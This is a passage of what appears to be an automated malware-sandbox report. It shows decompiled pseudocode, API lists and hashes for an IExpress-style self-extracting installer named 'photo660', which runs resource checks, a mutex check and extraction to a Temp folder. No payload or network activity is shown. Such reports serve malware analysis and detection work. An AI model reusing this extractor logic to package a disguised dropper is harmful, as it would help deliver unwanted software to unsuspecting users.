						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xa991e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00A9658A(0xa991e4, 0x104, 0xa91140);
								_t27 = E00A958C8(0xa991e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xa991e4 - 0x5c;
									if( *0xa991e4 != 0x5c) {
										L30:
										_t30 = E00A9597D(0xa991e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xa991e5 - 0x5c;
									if( *0xa991e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00A944B9(_t64, 0x54a, 0xa991e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xa991e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xa991e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xa991e4 - 0x5c;
						if( *0xa991e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xa99124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xa99a3c, 0x3e8, 0xa98598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00A94224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa987a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00A944B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                        0x00a9321b
                                                                                                                                                                                                        0x00a9321e
                                                                                                                                                                                                        0x00a93221
                                                                                                                                                                                                        0x00a9343c
                                                                                                                                                                                                        0x00a9343e
                                                                                                                                                                                                        0x00a9343f
                                                                                                                                                                                                        0x00a93445
                                                                                                                                                                                                        0x00a93447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93447
                                                                                                                                                                                                        0x00a93229
                                                                                                                                                                                                        0x00a9322a
                                                                                                                                                                                                        0x00a9322f
                                                                                                                                                                                                        0x00a933ec
                                                                                                                                                                                                        0x00a933f7
                                                                                                                                                                                                        0x00a93410
                                                                                                                                                                                                        0x00a93416
                                                                                                                                                                                                        0x00a9341d
                                                                                                                                                                                                        0x00a9342d
                                                                                                                                                                                                        0x00a9342d
                                                                                                                                                                                                        0x00a93438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93438
                                                                                                                                                                                                        0x00a93237
                                                                                                                                                                                                        0x00a93243
                                                                                                                                                                                                        0x00a93243
                                                                                                                                                                                                        0x00a93246
                                                                                                                                                                                                        0x00a932ee
                                                                                                                                                                                                        0x00a932f4
                                                                                                                                                                                                        0x00a932f6
                                                                                                                                                                                                        0x00a933d4
                                                                                                                                                                                                        0x00a933d6
                                                                                                                                                                                                        0x00a933db
                                                                                                                                                                                                        0x00a933dc
                                                                                                                                                                                                        0x00a933de
                                                                                                                                                                                                        0x00a933df
                                                                                                                                                                                                        0x00a93370
                                                                                                                                                                                                        0x00a93372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93372
                                                                                                                                                                                                        0x00a932fc
                                                                                                                                                                                                        0x00a93301
                                                                                                                                                                                                        0x00a93301
                                                                                                                                                                                                        0x00a93303
                                                                                                                                                                                                        0x00a93304
                                                                                                                                                                                                        0x00a93304
                                                                                                                                                                                                        0x00a9330a
                                                                                                                                                                                                        0x00a9330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93313
                                                                                                                                                                                                        0x00a93318
                                                                                                                                                                                                        0x00a9331a
                                                                                                                                                                                                        0x00a93331
                                                                                                                                                                                                        0x00a93332
                                                                                                                                                                                                        0x00a9333a
                                                                                                                                                                                                        0x00a9333d
                                                                                                                                                                                                        0x00a9337c
                                                                                                                                                                                                        0x00a93388
                                                                                                                                                                                                        0x00a9338f
                                                                                                                                                                                                        0x00a93394
                                                                                                                                                                                                        0x00a93396
                                                                                                                                                                                                        0x00a933a4
                                                                                                                                                                                                        0x00a933ab
                                                                                                                                                                                                        0x00a933b6
                                                                                                                                                                                                        0x00a933be
                                                                                                                                                                                                        0x00a933c3
                                                                                                                                                                                                        0x00a933c5
                                                                                                                                                                                                        0x00a93435
                                                                                                                                                                                                        0x00a93437
                                                                                                                                                                                                        0x00a93437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93437
                                                                                                                                                                                                        0x00a933c7
                                                                                                                                                                                                        0x00a933c9
                                                                                                                                                                                                        0x00a933cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a933cc
                                                                                                                                                                                                        0x00a933ad
                                                                                                                                                                                                        0x00a933b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a933b4
                                                                                                                                                                                                        0x00a93398
                                                                                                                                                                                                        0x00a93399
                                                                                                                                                                                                        0x00a9339b
                                                                                                                                                                                                        0x00a9339c
                                                                                                                                                                                                        0x00a9339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9339d
                                                                                                                                                                                                        0x00a9334c
                                                                                                                                                                                                        0x00a93351
                                                                                                                                                                                                        0x00a93354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9335c
                                                                                                                                                                                                        0x00a93362
                                                                                                                                                                                                        0x00a93364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93366
                                                                                                                                                                                                        0x00a93367
                                                                                                                                                                                                        0x00a93369
                                                                                                                                                                                                        0x00a9336a
                                                                                                                                                                                                        0x00a9336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9336b
                                                                                                                                                                                                        0x00a9331c
                                                                                                                                                                                                        0x00a93323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93329
                                                                                                                                                                                                        0x00a9332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9332b
                                                                                                                                                                                                        0x00a9324c
                                                                                                                                                                                                        0x00a9324c
                                                                                                                                                                                                        0x00a9324f
                                                                                                                                                                                                        0x00a932c8
                                                                                                                                                                                                        0x00a932ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a932ce
                                                                                                                                                                                                        0x00a93251
                                                                                                                                                                                                        0x00a93256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93271
                                                                                                                                                                                                        0x00a93277
                                                                                                                                                                                                        0x00a93279
                                                                                                                                                                                                        0x00a93298
                                                                                                                                                                                                        0x00a9329d
                                                                                                                                                                                                        0x00a9329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a932b0
                                                                                                                                                                                                        0x00a932b6
                                                                                                                                                                                                        0x00a932b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a932be
                                                                                                                                                                                                        0x00a93280
                                                                                                                                                                                                        0x00a93289
                                                                                                                                                                                                        0x00a9328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9328e
                                                                                                                                                                                                        0x00a9327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00A98598,00000200), ref: 00A93271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A933E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00A933F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A93410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00A93426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00A9342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00A9343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$photo660
                                                                                                                                                                                                        • API String ID: 2418873061-4267169756
                                                                                                                                                                                                        • Opcode ID: d649dbc003e1c580f5e2b1c9acfcc95045090fec06596165dc6a11d624489bf7
                                                                                                                                                                                                        • Instruction ID: 2019e256d002927090024b02adf54369c2bacef0d64672ebdb75fadfa15a0e67
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d649dbc003e1c580f5e2b1c9acfcc95045090fec06596165dc6a11d624489bf7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF514D3238024077EF219B795D4DFBB29FCEB96B55F20412AF106DA1D0DEA4CE0392A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A92CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A92CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xa98004; // 0x6298f871
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xa99a3c = __ecx;
				memset(0xa99140, 0, 0x8fc);
				memset(0xa98a20, 0, 0x32c);
				memset(0xa988c0, 0, 0x104);
				 *0xa993ec = 1;
				_t20 = E00A9468F("TITLE", 0xa99154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xa9858c = _t27;
					SetEvent(_t27);
					_t64 = 0xa99a34;
					if(E00A9468F("EXTRACTOPT", 0xa99a34, 4) != 0) {
						if(( *0xa99a34 & 0x000000c0) == 0) {
							L12:
							 *0xa99120 =  *0xa99120 & _t65;
							if(E00A95C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xa98a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xa98184 != 0) {
										__imp__#17();
									}
									if( *0xa98a24 == 0) {
										_t57 = _t65;
										if(E00A936EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xa99a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xa99a34 & 0x00000100) == 0 || ( *0xa98a38 & 0x00000001) != 0 || E00A918A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00A96517(_t57, 0x7d6, _t34, E00A919E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00A92390(0xa98a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00A944B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00A9468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xa98588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xa99a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00A944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00A944B9(0, 0x54b, "photo660", 0, 0x10, 0);
										L11:
										CloseHandle( *0xa98588);
										 *0xa99124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xa99124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00A96CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                        0x00a92cb5
                                                                                                                                                                                                        0x00a92cbc
                                                                                                                                                                                                        0x00a92cc7
                                                                                                                                                                                                        0x00a92cc9
                                                                                                                                                                                                        0x00a92cd1
                                                                                                                                                                                                        0x00a92cd3
                                                                                                                                                                                                        0x00a92cd9
                                                                                                                                                                                                        0x00a92ce9
                                                                                                                                                                                                        0x00a92cf9
                                                                                                                                                                                                        0x00a92d0e
                                                                                                                                                                                                        0x00a92d15
                                                                                                                                                                                                        0x00a92d1c
                                                                                                                                                                                                        0x00a92ef3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92d2d
                                                                                                                                                                                                        0x00a92d34
                                                                                                                                                                                                        0x00a92d3b
                                                                                                                                                                                                        0x00a92d40
                                                                                                                                                                                                        0x00a92d48
                                                                                                                                                                                                        0x00a92d59
                                                                                                                                                                                                        0x00a92d84
                                                                                                                                                                                                        0x00a92e1f
                                                                                                                                                                                                        0x00a92e1f
                                                                                                                                                                                                        0x00a92e2e
                                                                                                                                                                                                        0x00a92e41
                                                                                                                                                                                                        0x00a92e5a
                                                                                                                                                                                                        0x00a92e62
                                                                                                                                                                                                        0x00a92e6c
                                                                                                                                                                                                        0x00a92e6c
                                                                                                                                                                                                        0x00a92e75
                                                                                                                                                                                                        0x00a92e77
                                                                                                                                                                                                        0x00a92e77
                                                                                                                                                                                                        0x00a92e84
                                                                                                                                                                                                        0x00a92e8b
                                                                                                                                                                                                        0x00a92e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92e96
                                                                                                                                                                                                        0x00a92e96
                                                                                                                                                                                                        0x00a92e9e
                                                                                                                                                                                                        0x00a92ea2
                                                                                                                                                                                                        0x00a92eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92ece
                                                                                                                                                                                                        0x00a92ede
                                                                                                                                                                                                        0x00a92eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92eed
                                                                                                                                                                                                        0x00a92eef
                                                                                                                                                                                                        0x00a92eef
                                                                                                                                                                                                        0x00a92eef
                                                                                                                                                                                                        0x00a92eef
                                                                                                                                                                                                        0x00a92ea2
                                                                                                                                                                                                        0x00a92e86
                                                                                                                                                                                                        0x00a92e88
                                                                                                                                                                                                        0x00a92e88
                                                                                                                                                                                                        0x00a92e43
                                                                                                                                                                                                        0x00a92e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92e48
                                                                                                                                                                                                        0x00a92e30
                                                                                                                                                                                                        0x00a92e30
                                                                                                                                                                                                        0x00a92ef8
                                                                                                                                                                                                        0x00a92f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92f01
                                                                                                                                                                                                        0x00a92d8a
                                                                                                                                                                                                        0x00a92d8f
                                                                                                                                                                                                        0x00a92da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92da3
                                                                                                                                                                                                        0x00a92dae
                                                                                                                                                                                                        0x00a92db4
                                                                                                                                                                                                        0x00a92dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92dca
                                                                                                                                                                                                        0x00a92dd3
                                                                                                                                                                                                        0x00a92df5
                                                                                                                                                                                                        0x00a92e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92dd5
                                                                                                                                                                                                        0x00a92dde
                                                                                                                                                                                                        0x00a92de3
                                                                                                                                                                                                        0x00a92e04
                                                                                                                                                                                                        0x00a92e0a
                                                                                                                                                                                                        0x00a92e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92e10
                                                                                                                                                                                                        0x00a92dd3
                                                                                                                                                                                                        0x00a92dbb
                                                                                                                                                                                                        0x00a92da1
                                                                                                                                                                                                        0x00a92d5b
                                                                                                                                                                                                        0x00a92d5b
                                                                                                                                                                                                        0x00a92d5d
                                                                                                                                                                                                        0x00a92d69
                                                                                                                                                                                                        0x00a92d6e
                                                                                                                                                                                                        0x00a92f06
                                                                                                                                                                                                        0x00a92f06
                                                                                                                                                                                                        0x00a92f06
                                                                                                                                                                                                        0x00a92d59
                                                                                                                                                                                                        0x00a92f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92CF9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(photo660,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92E0A
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$photo660
                                                                                                                                                                                                        • API String ID: 1002816675-3055790139
                                                                                                                                                                                                        • Opcode ID: 15bccdbc09b28ac740f14803f72cdffd6a89fdc805ac3800293a8de828666428
                                                                                                                                                                                                        • Instruction ID: d74ed699062868c344ec5ec34d6147a52c079d1e98f9863d3ea3e8ce2b981273
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15bccdbc09b28ac740f14803f72cdffd6a89fdc805ac3800293a8de828666428
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F551C3703403017BEF64ABA89D8ABBB2AE8EB55740F10402BF941D55E5DFB88C438765
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A934F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00A934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xa991d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xa98584 = _t35;
					E00A943D0(_t35, GetDesktopWindow());
					__eflags =  *0xa98184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "photo660");
					_t17 = CreateThread(0, 0, E00A94FE0, 0, 0, 0xa98798);
					 *0xa9879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00A944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xa9858c);
					_t38 =  *0xa98584; // 0x0
					_t25 = E00A944B9(_t38, 0x4b2, 0xa91140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xa991d8 = 1;
						SetEvent( *0xa9858c);
						_t39 =  *0xa9879c; // 0x0
						E00A93680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xa9858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xa9879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                        0x00a934fb
                                                                                                                                                                                                        0x00a934fe
                                                                                                                                                                                                        0x00a93665
                                                                                                                                                                                                        0x00a93666
                                                                                                                                                                                                        0x00a93666
                                                                                                                                                                                                        0x00a93668
                                                                                                                                                                                                        0x00a9366e
                                                                                                                                                                                                        0x00a9366e
                                                                                                                                                                                                        0x00a93671
                                                                                                                                                                                                        0x00a93671
                                                                                                                                                                                                        0x00a93677
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93677
                                                                                                                                                                                                        0x00a93504
                                                                                                                                                                                                        0x00a93506
                                                                                                                                                                                                        0x00a93507
                                                                                                                                                                                                        0x00a9350c
                                                                                                                                                                                                        0x00a9365b
                                                                                                                                                                                                        0x00a9365f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93661
                                                                                                                                                                                                        0x00a93512
                                                                                                                                                                                                        0x00a93515
                                                                                                                                                                                                        0x00a935be
                                                                                                                                                                                                        0x00a935c1
                                                                                                                                                                                                        0x00a935d1
                                                                                                                                                                                                        0x00a935d8
                                                                                                                                                                                                        0x00a935de
                                                                                                                                                                                                        0x00a935f8
                                                                                                                                                                                                        0x00a93617
                                                                                                                                                                                                        0x00a93617
                                                                                                                                                                                                        0x00a93623
                                                                                                                                                                                                        0x00a93637
                                                                                                                                                                                                        0x00a9363d
                                                                                                                                                                                                        0x00a93642
                                                                                                                                                                                                        0x00a93644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93646
                                                                                                                                                                                                        0x00a93652
                                                                                                                                                                                                        0x00a93657
                                                                                                                                                                                                        0x00a93658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93658
                                                                                                                                                                                                        0x00a93644
                                                                                                                                                                                                        0x00a9351b
                                                                                                                                                                                                        0x00a9351d
                                                                                                                                                                                                        0x00a9354f
                                                                                                                                                                                                        0x00a93553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9355f
                                                                                                                                                                                                        0x00a93565
                                                                                                                                                                                                        0x00a9357c
                                                                                                                                                                                                        0x00a93581
                                                                                                                                                                                                        0x00a93584
                                                                                                                                                                                                        0x00a9359b
                                                                                                                                                                                                        0x00a935a1
                                                                                                                                                                                                        0x00a935a7
                                                                                                                                                                                                        0x00a935ad
                                                                                                                                                                                                        0x00a935b3
                                                                                                                                                                                                        0x00a935b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a935b8
                                                                                                                                                                                                        0x00a93586
                                                                                                                                                                                                        0x00a93588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93590
                                                                                                                                                                                                        0x00a93524
                                                                                                                                                                                                        0x00a93535
                                                                                                                                                                                                        0x00a93541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00A93535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00A93541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00A9355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00A91140,00000000,00000020,00000004), ref: 00A93590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A935C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A935F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00A935F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A93610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00A93617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00A93623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00A93637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00A93671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
